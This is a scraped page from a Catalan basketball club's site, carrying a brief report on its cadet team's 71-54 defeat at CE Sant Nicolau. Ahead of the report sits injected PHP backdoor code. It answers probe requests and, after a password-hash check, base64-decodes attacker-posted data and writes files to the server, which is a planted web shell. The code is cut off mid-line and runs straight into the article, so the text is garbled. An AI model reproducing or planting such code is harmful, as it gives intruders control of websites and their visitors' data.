function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Cadet masculí 06 A perd tots els duels defensius i debuta amb derrota a la pista del CE Sant Nicolau (71-54) - Tgn Bàsquet Club -

El Cadet masculí 06 A perd tots els duels defensius i debuta amb derrota a la pista del CE Sant Nicolau (71-54)

Updated: març 23, 2021

L’equip cadet masculí 06 A va perdre a la pista del CE Sant Nicolau en un partit dominat pels locals des de l’inici. La falta de decisió a l’hora d’atacar el cèrcol rival i, sobretot, la debilitat defensiva en els un contra un, va condemnar el TGN Bàsquet, que va arribar a perdre per 27 punts de diferència (59-42 al final del tercer quart).

Malgrat aquesta diferència, els nois que entrena Àlex Garrido es van refer i van treure l’amor propi, fent un últim quart molt bo i retallant diferències. Amb tot, la victòria era una quimera perquè la reacció tarragonina va arribar massa tard.